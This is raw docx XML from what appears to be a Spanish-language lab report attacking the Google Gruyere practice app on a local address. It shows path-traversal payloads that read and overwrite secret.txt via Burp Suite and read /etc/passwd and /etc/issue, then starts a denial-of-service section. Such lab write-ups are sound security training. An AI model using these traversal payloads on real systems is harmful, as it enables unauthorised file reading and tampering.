        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D915866" w14:textId="59892605" w:rsidR="008A436D" w:rsidRDefault="008A436D" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="008A436D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D8485C6" wp14:editId="50B3B957">
            <wp:extent cx="5400040" cy="3591560"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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3591560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B1EC6A" w14:textId="4BC76829" w:rsidR="00641C00" w:rsidRDefault="00641C00" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62E17932" w14:textId="5D137279" w:rsidR="00AD59DD" w:rsidRDefault="00AC573E" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bien ahora buscaremos el contenido del archivo secret.txt. Los navegadores no </w:t>
      </w:r>
      <w:r w:rsidR="00E87F49">
        <w:t xml:space="preserve">aceptan el comando </w:t>
      </w:r>
      <w:r>
        <w:t>../ entonces lo escaparemos con 0x2f o</w:t>
      </w:r>
      <w:r w:rsidR="00C57F5D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>%2f.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8FE162" w14:textId="40C6344F" w:rsidR="008A436D" w:rsidRDefault="008A436D" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ED18E06" w14:textId="77777777" w:rsidR="008A436D" w:rsidRDefault="008A436D" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D93786D" w14:textId="7729B691" w:rsidR="00E87F49" w:rsidRDefault="00E87F49" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Entonces tendremos que </w:t>
      </w:r>
      <w:r w:rsidR="00CF2C99">
        <w:t>poner:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6176058F" w14:textId="5A203644" w:rsidR="00E87F49" w:rsidRDefault="00000000" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:hyperlink r:id="rId240" w:history="1">
        <w:r w:rsidR="00E87F49" w:rsidRPr="0047476A">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://192.168.1.99:8080/484345658214029200767271373289240266932/..%2fsecret.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7D0BB6B2" w14:textId="7F1FA2B1" w:rsidR="00E87F49" w:rsidRDefault="00E87F49" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00E87F49">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="201E6BA5" wp14:editId="566503FA">
            <wp:extent cx="5400040" cy="5842000"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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5842000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB16A17" w14:textId="603FF60E" w:rsidR="00250F98" w:rsidRDefault="00250F98" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10CF611D" w14:textId="1615DFBB" w:rsidR="00250F98" w:rsidRDefault="005273D6" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora</w:t>
      </w:r>
      <w:r w:rsidR="00250F98">
        <w:t xml:space="preserve"> que sabemos que gruyere es vulnerable al este ataque, podemos diseñar un ataque de manipulación de datos cambiando el contenido del archivo secret.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D400261" w14:textId="271E728D" w:rsidR="00250F98" w:rsidRDefault="00250F98" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Primero creo un archivo secret.txt y lo subo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561D4B23" w14:textId="3CD8553B" w:rsidR="00250F98" w:rsidRDefault="00250F98" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="524A9844" w14:textId="717EA275" w:rsidR="00250F98" w:rsidRDefault="00250F98" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00250F98">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09B06BEA" wp14:editId="13A9BB2E">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="222B5F09" w14:textId="656BDE88" w:rsidR="00250F98" w:rsidRDefault="00250F98" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7644F6D2" w14:textId="5507B047" w:rsidR="00250F98" w:rsidRDefault="00250F98" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pero ahora cuando lo suba, capturo la petición con el </w:t>
      </w:r>
      <w:r w:rsidR="00B726BB">
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">urp </w:t>
      </w:r>
      <w:r w:rsidR="00B726BB">
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>uite y</w:t>
      </w:r>
      <w:r w:rsidR="005273D6">
        <w:t xml:space="preserve"> cambio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> la ruta a ../secret.txt y así modificar el archivo de secret</w:t>
      </w:r>
      <w:r w:rsidR="005273D6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BA5471" w14:textId="69508B63" w:rsidR="00250F98" w:rsidRDefault="00250F98" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52003D6A" w14:textId="072C06D4" w:rsidR="00250F98" w:rsidRDefault="00CF2C99" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00CF2C99">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F0EA7D7" wp14:editId="56561235">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="291" name="Imagen 29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n 291" descr="Una captura de pantalla de una computadora&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId243"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C43F3E2" w14:textId="11A0E3FF" w:rsidR="005273D6" w:rsidRDefault="005273D6" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64576C6D" w14:textId="4FF4A1E7" w:rsidR="005273D6" w:rsidRDefault="005273D6" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Consiguiendo con esto modificar el archivo secret:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F3F461" w14:textId="3F0553F8" w:rsidR="005273D6" w:rsidRDefault="005273D6" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="005273D6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4747BEE4" wp14:editId="55BB9AB5">
            <wp:extent cx="5400040" cy="5842000"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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5842000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A732D55" w14:textId="74F3E40F" w:rsidR="00CF2C99" w:rsidRDefault="00CF2C99" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00CF2C99">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B80FF0C" wp14:editId="05363091">
            <wp:extent cx="5400040" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="292" name="Imagen 29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n 292" descr="Interfaz de usuario gráfica, Texto&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId245"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBFB692" w14:textId="10E355F4" w:rsidR="005273D6" w:rsidRDefault="005273D6" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C6523C4" w14:textId="35ADAF87" w:rsidR="005273D6" w:rsidRDefault="005273D6" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Lo veremos en el servidor web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6333984C" w14:textId="4D6675AC" w:rsidR="005273D6" w:rsidRDefault="005273D6" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EBD2E0F" w14:textId="219F3A4E" w:rsidR="005273D6" w:rsidRDefault="0071765D" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="0071765D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="043A2DB8" wp14:editId="5BA6B965">
            <wp:extent cx="5399854" cy="4579883"/>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26699" cy="4602652"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="588C6D06" w14:textId="77777777" w:rsidR="00043525" w:rsidRDefault="00A879A6" w:rsidP="00043525">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Vamos ahora a comprobar la página raíz: </w:t>
      </w:r>
      <w:hyperlink r:id="rId247" w:history="1">
        <w:r w:rsidRPr="00E0472E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://192.168.1.99:8080</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00043525">
        <w:t>, , indica en Acunetix como una vulnerabilidad:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748C9295" w14:textId="013DEFDC" w:rsidR="00DF2607" w:rsidRDefault="00DF2607" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D7C915A" w14:textId="3C3907BE" w:rsidR="00A879A6" w:rsidRDefault="00A879A6" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Probaré con diferentes pailoads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EADB63" w14:textId="6CBE36D6" w:rsidR="00A879A6" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId248" w:history="1">
        <w:r w:rsidR="000B7124" w:rsidRPr="00E0472E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://192.168.1.99:8080/../etc/passwd</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000B7124">
        <w:t xml:space="preserve"> -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584AAA06" w14:textId="7E4D5CD9" w:rsidR="000B7124" w:rsidRDefault="000B7124" w:rsidP="000B7124">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r w:rsidRPr="000B7124">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="551FB3AF" wp14:editId="50739CA6">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="284" name="Imagen 28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descr="Interfaz de usuario gráfica, Texto, Aplicación, Word&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId249"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EFFB26" w14:textId="2982C6A2" w:rsidR="000B7124" w:rsidRDefault="000B7124" w:rsidP="000B7124">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="190B0900" w14:textId="5D831BE3" w:rsidR="000B7124" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId250" w:history="1">
        <w:r w:rsidR="000B7124" w:rsidRPr="00E0472E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://192.168.1.99:8080/..%5Cetc%5Cpasswd</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000B7124">
        <w:t xml:space="preserve"> -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D1C3F0" w14:textId="4F5673F3" w:rsidR="000B7124" w:rsidRDefault="000B7124" w:rsidP="000B7124">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42AB2019" w14:textId="51C8AEAC" w:rsidR="000B7124" w:rsidRDefault="000B7124" w:rsidP="000B7124">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r w:rsidRPr="000B7124">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33013A88" wp14:editId="1E0570E4">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="286" name="Imagen 28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n 286" descr="Interfaz de usuario gráfica, Texto, Aplicación, Chat o mensaje de texto&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId251"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE1E024" w14:textId="66608EE1" w:rsidR="000B7124" w:rsidRDefault="000B7124" w:rsidP="000B7124">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21564AB9" w14:textId="1220EA18" w:rsidR="000B7124" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId252" w:history="1">
        <w:r w:rsidR="000B7124" w:rsidRPr="00E0472E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://192.168.1.99:8080/..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000B7124">
        <w:t xml:space="preserve"> -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C15E75" w14:textId="7C5169C5" w:rsidR="000B7124" w:rsidRDefault="000B7124" w:rsidP="000B7124">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A539E67" w14:textId="4FA7A183" w:rsidR="000B7124" w:rsidRDefault="000B7124" w:rsidP="000B7124">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r w:rsidRPr="000B7124">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="164566F2" wp14:editId="060D84AD">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="287" name="Imagen 28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n 287" descr="Captura de pantalla de computadora&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId253"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEBEF0F" w14:textId="323F15CD" w:rsidR="000B7124" w:rsidRDefault="000B7124" w:rsidP="000B7124">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39341CFC" w14:textId="5A948C96" w:rsidR="000B7124" w:rsidRDefault="000B7124" w:rsidP="000B7124">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t>Podemos comprobar que con esta paiload funciono, por lo tanto, es vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3FBD66" w14:textId="7451BCFB" w:rsidR="000B7124" w:rsidRDefault="000B7124" w:rsidP="000B7124">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ECBDB98" w14:textId="21B8822A" w:rsidR="000B7124" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId254" w:history="1">
        <w:r w:rsidR="000B7124" w:rsidRPr="00E0472E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://192.168.1.99:8080/..%2f..%2f..%2f..%2f..%2f..%2fetc%2fissue</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000B7124">
        <w:t xml:space="preserve"> -&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E66519C" w14:textId="7655AB08" w:rsidR="000B7124" w:rsidRDefault="000B7124" w:rsidP="000B7124">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F8F382F" w14:textId="6D3013B1" w:rsidR="000B7124" w:rsidRDefault="000B7124" w:rsidP="000B7124">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r w:rsidRPr="000B7124">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76720CAB" wp14:editId="1D269BB4">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="295" name="Imagen 29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n 295" descr="Captura de pantalla de computadora&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId255"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68705C31" w14:textId="398DBD69" w:rsidR="000B7124" w:rsidRDefault="000B7124" w:rsidP="000B7124">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DA8376B" w14:textId="7E4B2505" w:rsidR="000B7124" w:rsidRDefault="000B7124" w:rsidP="000B7124">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
      <w:r>
        <w:t>Con este también funciona.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D83E48" w14:textId="77777777" w:rsidR="000B7124" w:rsidRDefault="000B7124" w:rsidP="000B7124">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1428"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17D84214" w14:textId="77777777" w:rsidR="00A879A6" w:rsidRDefault="00A879A6" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D2E1AD9" w14:textId="5CC8C355" w:rsidR="0071765D" w:rsidRDefault="0071765D" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="234A0DE7" w14:textId="7D386D9B" w:rsidR="00B4201B" w:rsidRDefault="00B4201B" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78D1D468" w14:textId="5CBD1127" w:rsidR="006B703C" w:rsidRDefault="006B703C">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc128034169"/>
      <w:r>
        <w:t>Negación de servicio -&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="5C47F615" w14:textId="4FB87991" w:rsidR="001A5205" w:rsidRDefault="001A5205" w:rsidP="001A5205"/>
    <w:p w14:paraId="731C85C4" w14:textId="4A709564" w:rsidR="001A5205" w:rsidRDefault="001A5205" w:rsidP="001A5205">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Aquí aprovecharemos algunos errores del servidor para evitar que atienda a peticiones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1FF06C" w14:textId="505749EE" w:rsidR="001A5205" w:rsidRDefault="001A5205" w:rsidP="001A5205">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FBC227A" w14:textId="7B0A7D1A" w:rsidR="001A5205" w:rsidRDefault="001A5205">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc128034170"/>
      <w:r>
        <w:t>DoS – Salir del servidor</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="5C6E3685" w14:textId="7E2B5518" w:rsidR="00011C8D" w:rsidRDefault="00011C8D" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Como iniciamos sesión como administrador (escalada de privilegios), vamos a ver como solicitar un comando de entrada del servidor. Esto se encuentra en la sección “Administrar este servidor”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6C8203" w14:textId="7BDC12FA" w:rsidR="00011C8D" w:rsidRDefault="00011C8D" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Para esto iniciaremos sesión con l cuenta ‘usuario’ contraseña ‘usuario’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D0F7F5" w14:textId="498E99C5" w:rsidR="00011C8D" w:rsidRDefault="00011C8D" w:rsidP="00011C8D">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00011C8D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B6F8F88" wp14:editId="1F7E40F4">
            <wp:extent cx="5400040" cy="5841365"/>
            <wp:effectExtent l="0" t="0" r="0" b="69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0040" cy="5841365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EADFF31" w14:textId="21B78865" w:rsidR="00011C8D" w:rsidRDefault="00011C8D" w:rsidP="00011C8D">
